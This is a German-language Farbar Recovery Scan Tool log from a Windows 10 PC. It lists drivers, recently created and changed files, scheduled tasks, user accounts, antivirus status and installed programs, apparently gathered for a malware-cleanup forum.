R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [77216 2018-05-16] (McAfee, LLC)
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [226984 2018-05-02] (McAfee, Inc.)
R2 McPvDrv; C:\WINDOWS\system32\drivers\McPvDrv.sys [105824 2018-05-02] (McAfee, Inc.)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [497568 2018-05-16] (McAfee, LLC)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [361888 2018-05-16] (McAfee, LLC)
U3 mfeavfk01; kein ImagePath
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [83952 2018-05-16] (McAfee, LLC)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [533408 2018-05-16] (McAfee, LLC)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [954784 2018-05-16] (McAfee, LLC)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [550288 2018-05-03] (McAfee LLC.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [108944 2018-05-03] (McAfee LLC.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [115616 2018-05-16] (McAfee, LLC)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [111608 2017-02-14] (McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252832 2018-05-16] (McAfee, LLC)
S3 pelmouse; C:\WINDOWS\system32\DRIVERS\pelmouse.sys [23040 2015-12-17] (TPMX Electronics Ltd.)
S3 pelusblf; C:\WINDOWS\system32\DRIVERS\pelusblf.sys [35328 2016-01-14] (TPMX Electronics Ltd.)
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [410880 2016-09-07] (Realsil Semiconductor Corporation)
R3 rtsuvc; C:\WINDOWS\system32\DRIVERS\rtsuvc.sys [3059440 2016-09-07] (Realtek Semiconductor Corp.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44616 2018-04-12] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [331680 2018-04-12] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [44032 2018-04-12] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2018-11-11 22:20 - 2018-11-11 22:23 - 000027883 _____ C:\Users\User\Downloads\FRST.txt
2018-11-11 22:19 - 2018-11-11 22:20 - 000000000 ____D C:\FRST
2018-11-11 22:11 - 2018-11-11 22:12 - 002415616 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
2018-11-11 13:25 - 2018-11-11 13:25 - 000012494 _____ C:\Users\User\Desktop\němčina gramatika.odt
2018-11-10 19:54 - 2018-11-10 19:55 - 001867936 _____ C:\Users\User\Downloads\brezen.zip
2018-11-10 19:53 - 2018-11-10 19:53 - 000693460 _____ C:\Users\User\Downloads\ctenarka (1).zip
2018-11-10 19:51 - 2018-11-10 19:51 - 000693460 _____ C:\Users\User\Downloads\ctenarka.zip
2018-11-10 19:49 - 2018-11-10 19:50 - 003959075 _____ C:\Users\User\Downloads\Justa unor (1).zip
2018-11-10 19:48 - 2018-11-10 19:48 - 003959075 _____ C:\Users\User\Downloads\Justa unor.zip
2018-11-10 19:47 - 2018-11-10 19:47 - 002216875 _____ C:\Users\User\Downloads\Justynka.zip
2018-11-10 14:00 - 2018-11-10 14:00 - 000000000 ___HD C:\OneDriveTemp
2018-11-09 21:21 - 2018-11-09 22:15 - 940553174 _____ C:\Users\User\Downloads\Mladý papež_2.avi
2018-11-08 20:14 - 2018-11-08 22:42 - 1632666636 _____ C:\Users\User\Downloads\Mladý papež, Young Pope, The (CZ) S01E02.mkv
2018-11-06 14:05 - 2018-09-04 23:36 - 001476904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2018-11-04 15:26 - 2018-11-04 15:26 - 000000000 ____D C:\Users\User\Documents\Aufgabenprogramm-1539448330382
2018-11-04 15:22 - 2018-11-04 15:23 - 004712808 _____ C:\Users\User\Downloads\Aufgabenprogramm-1539448330382.zip
2018-11-01 19:56 - 2018-11-01 19:56 - 000000000 ____D C:\Users\Default\AppData\Local\Google
2018-11-01 19:56 - 2018-11-01 19:56 - 000000000 ____D C:\Users\Default User\AppData\Local\Google
2018-10-31 22:31 - 2018-10-31 22:31 - 000001561 _____ C:\Users\User\Desktop\Skype.lnk
2018-10-30 18:34 - 2018-10-30 18:35 - 062774584 _____ (Skype Technologies S.A.) C:\Users\User\Downloads\Skype-8.33.0.50.exe
2018-10-28 14:00 - 2018-10-28 14:02 - 004712808 _____ C:\Users\User\Downloads\Aufgabenprogramm-1539448330382 (2).zip
2018-10-28 12:20 - 2018-10-28 12:20 - 000002478 _____ C:\Users\User\Desktop\Ben - Chrome.lnk
2018-10-28 12:19 - 2018-10-28 12:19 - 000002478 _____ C:\Users\User\Desktop\máta - Chrome.lnk
2018-10-28 12:14 - 2018-10-28 12:14 - 000002478 _____ C:\Users\User\Desktop\justa1 - Chrome.lnk
2018-10-28 12:13 - 2018-10-28 12:13 - 000002434 _____ C:\Users\User\Desktop\Profil 1 - Chrome.lnk
2018-10-27 16:25 - 2018-10-27 17:55 - 982706004 _____ C:\Users\User\Downloads\Rapl-13.díl.avi
2018-10-27 15:07 - 2018-10-27 15:58 - 946186000 _____ C:\Users\User\Downloads\Rapl 12 - Zdař Bůh!.avi
2018-10-27 12:29 - 2018-10-27 13:37 - 692434054 _____ C:\Users\User\Downloads\Rapl_11_Ticha_voda.avi
2018-10-27 11:17 - 2018-10-27 12:21 - 696309100 _____ C:\Users\User\Downloads\Rapl_10_Black_Jack.avi
2018-10-27 08:48 - 2018-10-27 09:41 - 925466496 _____ C:\Users\User\Downloads\Rapl-9.Amok-(2016).avi
2018-10-27 07:54 - 2018-10-27 08:21 - 506081064 _____ C:\Users\User\Downloads\Rapl -8.díl -Agent novinka.avi
2018-10-26 20:31 - 2018-10-26 20:31 - 000000000 ___RD C:\Users\User\Downloads\Microsoft.SkypeApp_kzf8qxf38zg5c!App
2018-10-26 15:11 - 2018-10-26 16:38 - 962589480 _____ C:\Users\User\Downloads\Rapl 7.díl.avi
2018-10-26 14:27 - 2018-10-26 15:03 - 667978888 _____ C:\Users\User\Downloads\Rapl- 6.Oheň MPEG-TS Nefina.mkv
2018-10-26 12:19 - 2018-10-26 13:00 - 715322368 _____ C:\Users\User\Downloads\Rapl 5. Zatmění.avi
2018-10-25 22:25 - 2018-10-25 23:32 - 742247328 _____ C:\Users\User\Downloads\Rapl 4. Bludný kořen.avi
2018-10-25 20:57 - 2018-10-25 22:23 - 959896590 _____ C:\Users\User\Downloads\Rapl 3.díl.avi
2018-10-25 18:37 - 2018-10-25 19:32 - 602106322 _____ C:\Users\User\Downloads\Rapl 2.Křížová cesta.avi
2018-10-24 20:31 - 2018-10-24 21:01 - 505367598 _____ C:\Users\User\Downloads\Rapl 01 Nástřel.avi
2018-10-24 14:41 - 2018-10-24 14:34 - 000042456 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswKbd.sys
2018-10-24 14:39 - 2018-10-24 14:35 - 000378584 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2018-10-23 14:07 - 2018-10-23 14:07 - 000000298 _____ C:\Users\User\Downloads\desktop (1).ini
2018-10-20 16:06 - 2018-10-20 16:56 - 548656230 _____ C:\Users\User\Downloads\Génius - Einstein (6).avi
2018-10-20 15:14 - 2018-10-20 16:03 - 527352300 _____ C:\Users\User\Downloads\Génius - Einstein (5).avi
2018-10-20 14:09 - 2018-10-20 15:01 - 565387930 _____ C:\Users\User\Downloads\Génius - Einstein (4) (1).avi
2018-10-20 13:37 - 2018-10-20 13:58 - 209649664 _____ C:\Users\User\Downloads\Génius - Einstein (4).avi
2018-10-20 12:35 - 2018-10-20 13:27 - 571699030 _____ C:\Users\User\Downloads\Génius - Einstein (3).avi
2018-10-16 19:14 - 2018-10-16 19:44 - 535513208 _____ C:\Users\User\Downloads\Labyrint III.7.dil.avi
2018-10-16 15:14 - 2018-10-16 15:15 - 000303888 _____ C:\Users\User\Downloads\ausmalbild184.pdf
2018-10-14 18:10 - 2018-10-14 19:09 - 644310216 _____ C:\Users\User\Downloads\Génius - Einstein (2).avi
2018-10-14 17:30 - 2018-10-23 20:20 - 000015108 _____ C:\Users\User\Desktop\němčina reise.odt

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2018-11-11 22:21 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2018-11-11 22:17 - 2016-09-06 19:24 - 000000000 ___RD C:\Users\User\OneDrive
2018-11-11 21:36 - 2018-09-13 13:57 - 000000000 ____D C:\Users\User\AppData\Local\AVAST Software
2018-11-11 21:34 - 2017-08-26 14:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2018-11-11 21:32 - 2017-08-26 14:38 - 000000000 __RSD C:\Users\User\Documents\Trezory společnosti McAfee
2018-11-11 21:29 - 2018-07-01 14:15 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2018-11-11 21:15 - 2018-07-01 14:58 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2018-11-11 21:15 - 2016-09-13 06:38 - 000001006 _____ C:\WINDOWS\Tasks\Bing Powered Search nocod.job
2018-11-11 16:15 - 2018-07-01 14:58 - 000004210 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{9CB99F3C-2641-4460-8D80-FF3A7E2045E2}
2018-11-11 08:56 - 2018-09-24 17:30 - 000003830 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2018-11-11 08:56 - 2018-09-24 17:30 - 000003530 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2018-11-11 08:56 - 2018-07-01 14:58 - 000003742 _____ C:\WINDOWS\System32\Tasks\Bing Powered Search nocod
2018-11-11 08:56 - 2018-07-01 14:58 - 000003558 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2018-11-11 08:56 - 2018-07-01 14:58 - 000003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2018-11-11 08:56 - 2018-07-01 14:58 - 000003334 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2018-11-11 08:56 - 2018-07-01 14:58 - 000002860 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3294147820-2580206503-2443620995-1001
2018-11-11 08:56 - 2018-07-01 14:58 - 000002470 _____ C:\WINDOWS\System32\Tasks\McAfeeLogon
2018-11-11 08:56 - 2018-07-01 14:58 - 000000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
2018-11-11 08:39 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2018-11-10 20:05 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps
2018-11-10 15:43 - 2016-09-06 19:21 - 000000000 ____D C:\Users\User\AppData\Local\VirtualStore
2018-11-09 23:30 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF
2018-11-09 21:22 - 2016-09-18 10:52 - 000000000 ____D C:\Users\User\AppData\Roaming\vlc
2018-11-09 20:02 - 2018-07-01 14:58 - 000004264 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update
2018-11-08 21:50 - 2018-07-01 14:20 - 000002433 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-11-08 15:39 - 2018-04-11 22:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2018-11-08 15:38 - 2016-09-07 15:20 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2018-11-08 15:33 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2018-11-07 15:36 - 2018-07-01 14:34 - 002435636 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2018-11-07 15:36 - 2018-07-01 11:55 - 000671522 _____ C:\WINDOWS\system32\perfh005.dat
2018-11-07 15:36 - 2018-07-01 11:55 - 000136624 _____ C:\WINDOWS\system32\perfc005.dat
2018-11-07 15:36 - 2018-04-12 17:13 - 000705444 _____ C:\WINDOWS\system32\perfh007.dat
2018-11-07 15:36 - 2018-04-12 17:13 - 000141952 _____ C:\WINDOWS\system32\perfc007.dat
2018-11-07 15:29 - 2018-04-11 22:04 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2018-11-01 19:59 - 2018-08-18 14:38 - 000002073 _____ C:\Users\Public\Desktop\Google Slides.lnk
2018-11-01 19:59 - 2018-08-18 14:38 - 000002071 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2018-11-01 19:59 - 2018-08-18 14:38 - 000002061 _____ C:\Users\Public\Desktop\Google Docs.lnk
2018-11-01 19:59 - 2018-08-18 14:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2018-11-01 17:19 - 2018-09-29 08:41 - 000000000 ____D C:\Users\User\Desktop\justy fotak
2018-10-28 16:43 - 2018-09-10 15:57 - 000000000 ____D C:\Users\User\AppData\Local\CrashDumps
2018-10-25 12:16 - 2016-09-07 19:27 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-10-25 12:16 - 2016-09-07 19:27 - 000002252 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2018-10-24 14:39 - 2018-04-12 00:38 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2018-10-24 14:36 - 2018-07-01 13:06 - 000467904 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2018-10-24 14:36 - 2018-07-01 13:06 - 000381144 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswVmm.sys
2018-10-24 14:36 - 2018-07-01 13:06 - 000208640 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswStm.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000201408 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswArPot.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000163376 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000111968 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000088112 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRvrt.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000047064 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHwid.sys
2018-10-24 14:31 - 2018-07-01 13:06 - 001028840 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSnx.sys
2018-10-24 14:30 - 2018-06-17 21:25 - 000185240 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHdsKe.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000346760 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbloga.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000230512 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsdrivera.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000201928 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsha.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000059664 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbuniva.sys
2018-10-24 14:21 - 2016-09-07 15:22 - 000559880 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2018-10-23 16:20 - 2018-07-01 15:59 - 000000000 ____D C:\ProgramData\Packages
2018-10-22 16:53 - 2016-09-07 20:02 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-10-16 15:28 - 2016-09-12 17:33 - 000000000 ____D C:\ProgramData\firebird
2018-10-13 07:06 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2018-10-13 07:06 - 2017-06-13 09:58 - 000000000 ___RD C:\Program Files (x86)\Skype
2018-10-13 07:06 - 2016-09-07 19:30 - 000000000 ____D C:\ProgramData\Skype
2018-10-13 07:05 - 2016-09-07 19:31 - 000000000 ____D C:\Users\User\AppData\Roaming\Skype
2018-10-12 12:20 - 2018-07-01 15:54 - 000000000 ___RD C:\Users\User\3D Objects
2018-10-12 12:20 - 2016-09-06 19:21 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-10-12 12:13 - 2018-07-01 14:15 - 000268840 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-10-12 12:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\TextInput
2018-10-12 12:08 - 2018-04-12 00:38 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2018-10-12 12:08 - 2018-04-12 00:38 - 000000000 ___RD C:\Program Files\Windows Defender
2018-10-12 12:08 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2018-10-12 12:08 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2018-10-12 12:08 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2018-06-17 20:58 - 2018-06-17 20:58 - 007649280 _____ () C:\Program Files (x86)\GUT4060.tmp
2017-01-03 20:30 - 2017-01-03 20:30 - 007680000 _____ () C:\Program Files (x86)\GUT62F7.tmp
2016-09-13 06:38 - 2016-09-13 06:38 - 000019963 _____ () C:\Users\User\AppData\Roaming\Muledaralo

Einige Dateien in TEMP:
====================
2001-09-29 01:30 - 2001-09-29 01:30 - 000483386 ____N (Microsoft Corporation) C:\Users\User\AppData\Local\Temp\EBUE187.exe
2018-09-24 19:34 - 2018-09-24 19:35 - 062481400 _____ (Skype Technologies S.A.) C:\Users\User\AppData\Local\Temp\SkypeSetup.exe
2018-10-08 12:45 - 2018-10-08 12:46 - 040210008 _____ () C:\Users\User\AppData\Local\Temp\vlc-3.0.4-win32.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2018-07-01 14:15

==================== Ende von FRST.txt ============================


Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 11.11.2018
durchgeführt von User (11-11-2018 22:26:04)
Gestartet von C:\Users\User\Downloads
Windows 10 Home Version 1803 17134.345 (X64) (2018-07-01 14:01:51)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3294147820-2580206503-2443620995-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3294147820-2580206503-2443620995-503 - Limited - Disabled)
Gast (S-1-5-21-3294147820-2580206503-2443620995-501 - Limited - Disabled)
User (S-1-5-21-3294147820-2580206503-2443620995-1001 - Administrator - Enabled) => C:\Users\User
WDAGUtilityAccount (S-1-5-21-3294147820-2580206503-2443620995-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee VirusScan (Disabled - Up to date) {8BCDACFA-D264-3528-5EF8-E94FD0BC1FBC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee VirusScan (Disabled - Up to date) {30AC4D1E-F45E-3AA6-6448-D23DAB3B5501}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
FW: McAfee Firewall (Disabled) {B3F62DDF-980B-3470-75A7-407A2E6F58C7}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 19.008.20080 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 30.0.0.107 - Adobe Systems Incorporated)
Adobe Flash Player 31 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aiseesoft Blu-ray Player 6.2.30 (HKLM-x32\...\{3E1A13C3-E458-4995-BEA6-4B9BE279D502}_is1) (Version: 6.2.30 - Aiseesoft Studio)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 18.7.2354 - AVAST Software)
Backup and Sync from Google (HKLM\...\{608EBDC6-D18A-4CF6-AD54-EE6B71D29065}) (Version: 3.43.1584.4446 - Google, Inc.)
Bontia Studio (HKLM-x32\...\{9543751a-3deb-418d-b86d-5af77ebdc033}) (Version: 5.3.4304.21839 - Bontia a.s.)
Bontia Studio 5.3 (HKLM-x32\...\{278BD020-1DCD-46C2-B9F6-36E88E10AC64}) (Version: 5.3.4304.0 - Bontia, a.s.) Hidden
CDBurnerXP (HKLM\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.7.6321 - CDBurnerXP)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.66.16.50 - Conexant)
Conexant SmartAudio (HKLM\...\SAII) (Version: 6.0.224.0 - Conexant Systems)
DAPlayer 1.0.1.9 (HKLM-x32\...\DAPlayer_is1) (Version: - Digiarty Software,Inc.)
Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.5.1 - Dolby Laboratories Inc)
ELAN Touchpad 11.15.0.18_X64 (HKLM\...\Elantech) (Version: 11.15.0.18 - ELAN Microelectronic Corp.)
Galileo Family Quiz - Spezial II (HKLM-x32\...\Galileo Family Quiz - Spezial II) (Version: - SevenOne Intermedia)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 70.0.3538.77 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Grundwortschatz Deutsch (HKLM-x32\...\{1FF5F853-B241-4C3B-B58B-EE862472DB09}) (Version: 1.00.0000 - x)
Chromium (HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\...\Chromium) (Version: 51.0.2672.0 - Chromium)
Java 8 Update 101 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java 8 Update 181 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
Java 8 Update 181 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
Lenovo EasyCamera (HKLM-x32\...\{E399A5B3-ED53-4DEA-AF04-8011E1EB1EAC}) (Version: 6.3.9600.11103 - Realtek Semiconductor Corp.)
Lernerfolg Grundschule Deutsch Teil 1 und 2 (HKLM-x32\...\{0309FEDE-8014-4DA7-BCEE-DBD5F2A02176}_is1) (Version: LernerfolgGerman 12 v2013 - Tivola)
Lernerfolg Grundschule Englisch Teil 1 und 2 (HKLM-x32\...\{CCF09A05-0B9D-4881-B015-C99637DEB6E4}_is1) (Version: LernerfolgEnglish 12 v2013 - Tivola)
Lernerfolg Grundschule Mathematik Teil 1 und 2 (HKLM-x32\...\{26A5F720-DCF2-4E8E-8BE5-F229041CE1BF}_is1) (Version: LernerfolgMathe 12 v2013 - Tivola)
McAfee Total Protection (HKLM-x32\...\MSC) (Version: 16.0 R13 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.7.213 - McAfee, Inc.)
Microsoft OneDrive (HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\...\OneDriveSetup.exe) (Version: 18.192.0920.0015 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Zoo Tycoon (HKLM-x32\...\Zoo Tycoon 1.0) (Version: - )
Mozilla Firefox 56.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 56.0 (x86 de)) (Version: 56.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 48.0.2 - Mozilla)
OpenOffice 4.1.2 (HKLM-x32\...\{69D27D4C-36CE-4CB2-A290-C38B0A990955}) (Version: 4.12.9782 - Apache Software Foundation)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Pomocník s aktualizací Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22452 - Microsoft Corporation)
Space Flight 1.0 (HKLM-x32\...\Space Flight_is1) (Version: - BrilliantOwl.com)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{5009B7EE-8A15-4A23-B404-15E31D02DA67}) (Version: 2.43.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{A7B60FC9-A750-43C7-B7EC-892CD09147C7}) (Version: 1.18.0.0 - Microsoft Corporation) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.3 - VideoLAN)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - )
WinRAR 5.60 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.60.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2018-10-04] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2018-10-04] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2018-10-04] (Google)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
